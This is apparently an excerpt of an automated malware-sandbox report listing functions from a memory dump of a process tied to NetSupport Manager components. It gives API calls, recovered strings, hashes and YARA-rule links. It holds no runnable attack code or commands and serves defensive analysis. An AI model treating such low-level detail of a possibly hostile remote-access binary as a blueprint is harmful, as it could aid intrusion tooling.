                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Palette$Select$BitmapCreateRealizeRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1213237138-0
                                                                                                                        • Opcode ID: 5561508bd95b73cd2ea96a816af863913079c679a9e9ba9c37af80affb17100a
                                                                                                                        • Instruction ID: 15cf903360e1337fcaf408f4abac8098cda0ed0a31a47acd7bf352fabe7425de
                                                                                                                        • Opcode Fuzzy Hash: 5561508bd95b73cd2ea96a816af863913079c679a9e9ba9c37af80affb17100a
                                                                                                                        • Instruction Fuzzy Hash: 9501D4766012147BDB215B69EC49FEBBBACEB8A761F1000A1FE08D3280DAB49D0185B1
                                                                                                                        Function 00B42166 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B42172
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __amsg_exit.LIBCMT ref: 00B42192
                                                                                                                        • __lock.LIBCMT ref: 00B421A2
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B421BF
                                                                                                                        • _free.LIBCMT ref: 00B421D2
                                                                                                                        • InterlockedIncrement.KERNEL32(027717F0), ref: 00B421EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3470314060-0
                                                                                                                        • Opcode ID: 1ce66a5e6880e3e209165b788abb0c7cb426695660d7ea443d92a93c1188b4b1
                                                                                                                        • Instruction ID: 3963f638cc9df72ad2019a9c3563c395e9501c9cfe4eb626ed2bd6c43f405f7c
                                                                                                                        • Opcode Fuzzy Hash: 1ce66a5e6880e3e209165b788abb0c7cb426695660d7ea443d92a93c1188b4b1
                                                                                                                        • Instruction Fuzzy Hash: 4A016131940611BBDB14AF64D84975977E0EF04B21F950189F91477290CB746E81FBD5
                                                                                                                        Function 00B43102 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B4310E
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __calloc_crt.LIBCMT ref: 00B43119
                                                                                                                          • Part of subcall function 00B45B13: Sleep.KERNEL32(00000000,00000000,?,?), ref: 00B45B3B
                                                                                                                        • __lock.LIBCMT ref: 00B4314F
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00B4315B
                                                                                                                        • __lock.LIBCMT ref: 00B4316F
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00B4317F
                                                                                                                          • Part of subcall function 00B3CFC7: __getptd_noexit.LIBCMT ref: 00B3CFC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3803058747-0
                                                                                                                        • Opcode ID: 9fac874b562514a970be2f8ae17bc66bc3a7212c7518a29493ec54ef3c77c804
                                                                                                                        • Instruction ID: dfcf427262eb22ccfca166e374ea2c507f0165ff67e23fe70aea9bf16eda378d
                                                                                                                        • Opcode Fuzzy Hash: 9fac874b562514a970be2f8ae17bc66bc3a7212c7518a29493ec54ef3c77c804
                                                                                                                        • Instruction Fuzzy Hash: D8017C71500701FBEB20BFB49946B0D7BE0AF45B60F604599F454AB2D2CBB44B41AB65
                                                                                                                        Function 00B23070 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 185COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 00B230A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectorySystem
                                                                                                                        • String ID: .dll$.org
                                                                                                                        • API String ID: 2188284642-843266101
                                                                                                                        • Opcode ID: 59af808c6611864e25050102c3b50ac9411a8d6e28804ffaf85ee074f4233a8c
                                                                                                                        • Instruction ID: 0dd2606ce57bd45fc797a3bbf2f730829ead03849c5f39c9b7794ce76afd8f28
                                                                                                                        • Opcode Fuzzy Hash: 59af808c6611864e25050102c3b50ac9411a8d6e28804ffaf85ee074f4233a8c
                                                                                                                        • Instruction Fuzzy Hash: 3F61DF75A0022A8BCB209F68D9567A773F4FF84740F058594EE4AAB351F774AE81CB90
                                                                                                                        Function 00B26C20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBCMT ref: 00B26C48
                                                                                                                        • _malloc.LIBCMT ref: 00B26C63
                                                                                                                        • _calloc.LIBCMT ref: 00B26CD6
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,?,00000400,00000000,00000000,product.dat,00000000), ref: 00B26D24
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_calloc_malloc_wcschr
                                                                                                                        • String ID: product.dat
                                                                                                                        • API String ID: 4249565170-2831009483
                                                                                                                        • Opcode ID: 9022f49080622f4a04dbfa99f06a222df6049a903207b3a20ffac298ad46e273
                                                                                                                        • Instruction ID: 589ed57a1b64b763f1e0cf322401041f6429b28f48eabbf13249cd325f7348c2
                                                                                                                        • Opcode Fuzzy Hash: 9022f49080622f4a04dbfa99f06a222df6049a903207b3a20ffac298ad46e273
                                                                                                                        • Instruction Fuzzy Hash: BF5138B1A002158BCB20DF68E885BAA77F4EF94340F1485F9EE4DDB245EB70D945CBA1
                                                                                                                        Function 00B26496 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h, xrefs: 00B264FC
                                                                                                                        • Restore Reg, %s=%d, xrefs: 00B2663A
                                                                                                                        • IsA(), xrefs: 00B26501
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc
                                                                                                                        • String ID: IsA()$Restore Reg, %s=%d$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 1579825452-1127581079
                                                                                                                        • Opcode ID: ee0091446b7d17c39b5e6af446b4199fa60cea04010473ca3b10ace2542f8890
                                                                                                                        • Instruction ID: 54b9edf114ca6310eacbbc7312c50e55e0910a0081c55546efc9f5c9ab56f4c1
                                                                                                                        • Opcode Fuzzy Hash: ee0091446b7d17c39b5e6af446b4199fa60cea04010473ca3b10ace2542f8890
                                                                                                                        • Instruction Fuzzy Hash: 965170729005299BCB24DB54DC52BEBB3F4EF99715F0441D8E91AA3281EB706F84CF90
                                                                                                                        Function 00B26494 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 162COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h, xrefs: 00B264FC
                                                                                                                        • Restore Reg, %s=%d, xrefs: 00B2663A
                                                                                                                        • IsA(), xrefs: 00B26501
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc
                                                                                                                        • String ID: IsA()$Restore Reg, %s=%d$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 1579825452-1127581079
                                                                                                                        • Opcode ID: d973c0734995c617fbf638c09ecfdf039433874f3176bd70a526d0f7057dd669
                                                                                                                        • Instruction ID: ccdeae44c7b00147adc7a8f70044aba6f0acd1e43e800934a6f021f3aa6b207f
                                                                                                                        • Opcode Fuzzy Hash: d973c0734995c617fbf638c09ecfdf039433874f3176bd70a526d0f7057dd669
                                                                                                                        • Instruction Fuzzy Hash: 0F5160729005299BCB24DB54EC52BEBB3F4EF99755F0441D8E91AA3281EB706F84CF90
                                                                                                                        Function 00AFC680 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: Local\$already created$already opened$name too long
                                                                                                                        • API String ID: 2111968516-487411162
                                                                                                                        • Opcode ID: ee143f16e551170aa7ebc2b033e0fcf6bfd92f0a538b1e92ca161a5678fab2b4
                                                                                                                        • Instruction ID: 503d39cc365ba71e3c1e97bd525d84d43d892050c6876a87377bdd9e4002ade3
                                                                                                                        • Opcode Fuzzy Hash: ee143f16e551170aa7ebc2b033e0fcf6bfd92f0a538b1e92ca161a5678fab2b4
                                                                                                                        • Instruction Fuzzy Hash: 4341DD31A4420D5BCB24AFA98E527BB73A1EF94320F1441A9FA469B391EB705D44CBC0
                                                                                                                        Function 00AF3000 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF301A
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF305A
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF30C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 1615890066-4289949731
                                                                                                                        • Opcode ID: bc64c41d507e8670aeffad668721b902fa688940c5de0e9c2b16bdf9f28bdf0e
                                                                                                                        • Instruction ID: dc0532933a01bbf3a9f98e90af5355c5c38326e873565818d60584f3ae3beece
                                                                                                                        • Opcode Fuzzy Hash: bc64c41d507e8670aeffad668721b902fa688940c5de0e9c2b16bdf9f28bdf0e
                                                                                                                        • Instruction Fuzzy Hash: C031B5333042189B8B20DF9DE88097AF3AAEFE4765720452FF605C7251DE729D41C7A5
                                                                                                                        Function 00AF50F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugOutputString__wcsicollwsprintf
                                                                                                                        • String ID: ICFConfig("%s", %d, "%s")$Undefined product
                                                                                                                        • API String ID: 1423417110-3451686069
                                                                                                                        • Opcode ID: ef3091e896dfdbe25835b2f567e36e64dfc3ba2a8a6792472cc756ea03811f9c
                                                                                                                        • Instruction ID: e54500f617e8c97813a1addabf014c39883ab2cf363349b7cc411100a34b0538
                                                                                                                        • Opcode Fuzzy Hash: ef3091e896dfdbe25835b2f567e36e64dfc3ba2a8a6792472cc756ea03811f9c
                                                                                                                        • Instruction Fuzzy Hash: 0131A075A00608AFC710EFA8DD85F6A77E5EF89714F104298FA1ADB361DA31ED01CB91
                                                                                                                        Function 00B02200 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$pszNew!=0$pszOld!=0
                                                                                                                        • API String ID: 1038674560-2511792043
                                                                                                                        • Opcode ID: 5c551755b41a4e0ea8323ef8fa9c02ff5066cb87b10808a9ee19639420073dab
                                                                                                                        • Instruction ID: 3a883877e3bbd9e5f10ac40905442023f6cd2d53d6768bdef11b48c647a4cb8d
                                                                                                                        • Opcode Fuzzy Hash: 5c551755b41a4e0ea8323ef8fa9c02ff5066cb87b10808a9ee19639420073dab
                                                                                                                        • Instruction Fuzzy Hash: AD31D836B502066BCB10EF98CC9AD9AB7E9EFA4740B144194FD059B2C1E670EE0CC7D0
                                                                                                                        Function 00B0C640 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B0C560: GetComputerNameW.KERNEL32(?,?), ref: 00B0C60E
                                                                                                                          • Part of subcall function 00B02200: __wcsnicmp.LIBCMT ref: 00B022B1
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B0C712
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B0C74E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete$ComputerName__wcsnicmp
                                                                                                                        • String ID: IsA()$\Registry\Machine\$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                                                        • API String ID: 758731895-1104758002
                                                                                                                        • Opcode ID: b58ee55c99a75b67aeb33404bc3adb7418a91e5824676f980e8410af7bd24796
                                                                                                                        • Instruction ID: d1f7c44a70c4525913f0235519077d4b2b3ad37c0e27171141c6c9b741cc01a8
                                                                                                                        • Opcode Fuzzy Hash: b58ee55c99a75b67aeb33404bc3adb7418a91e5824676f980e8410af7bd24796
                                                                                                                        • Instruction Fuzzy Hash: 0331A571D04209ABDB00EB98DC56FEEB7F8EF54704F104299F911B32C1EA756A04CBA1
                                                                                                                        Function 00AFC3F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91windowthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(?,0000004A,?,?), ref: 00AFC469
                                                                                                                        • SendMessageW.USER32(00000000,0000004A,?,?), ref: 00AFC4A2
                                                                                                                          • Part of subcall function 00AFC2C0: IsWindow.USER32(?), ref: 00AFC2E5
                                                                                                                          • Part of subcall function 00AFC2C0: GetClassNameW.USER32(?,?,00000040), ref: 00AFC2F9
                                                                                                                          • Part of subcall function 00AFC2C0: __wcsicoll.LIBCMT ref: 00AFC30A
                                                                                                                          • Part of subcall function 00AFC2C0: FindWindowW.USER32(?,00000000), ref: 00AFC340
                                                                                                                          • Part of subcall function 00AFC2C0: Sleep.KERNEL32(?,?,?), ref: 00AFC35C
                                                                                                                          • Part of subcall function 00AFC2C0: FindWindowW.USER32(?,00000000), ref: 00AFC370
                                                                                                                        • PostMessageW.USER32(00000000,0000004A,?,?), ref: 00AFC4BE
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\ipc.cpp, xrefs: 00AFC440
                                                                                                                        • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 00AFC445
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageWindow$FindPost$ClassNameSendSleepThread__wcsicoll
                                                                                                                        • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                                                        • API String ID: 703497514-1411620790
                                                                                                                        • Opcode ID: 465ed0c126b66b3eee8c3aa0281fc8ae5c98cc906c79d0c1981428a7e21e874a
                                                                                                                        • Instruction ID: bd2837d76ee9eec9cf0fe4f3ea2748dedc5f969f3d00a8b95baec6458617afed
                                                                                                                        • Opcode Fuzzy Hash: 465ed0c126b66b3eee8c3aa0281fc8ae5c98cc906c79d0c1981428a7e21e874a
                                                                                                                        • Instruction Fuzzy Hash: 1F2185763006099FD714CF55E994DB2F3A9FB94335B10862AF65A87A90C770BC50CB50
                                                                                                                        Function 00B1EEF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00B1EFA0
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00B1EFB8
                                                                                                                        • DestroyIcon.USER32(?), ref: 00B1EFC5
                                                                                                                        • ImageList_GetImageCount.COMCTL32(?), ref: 00B1EFCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
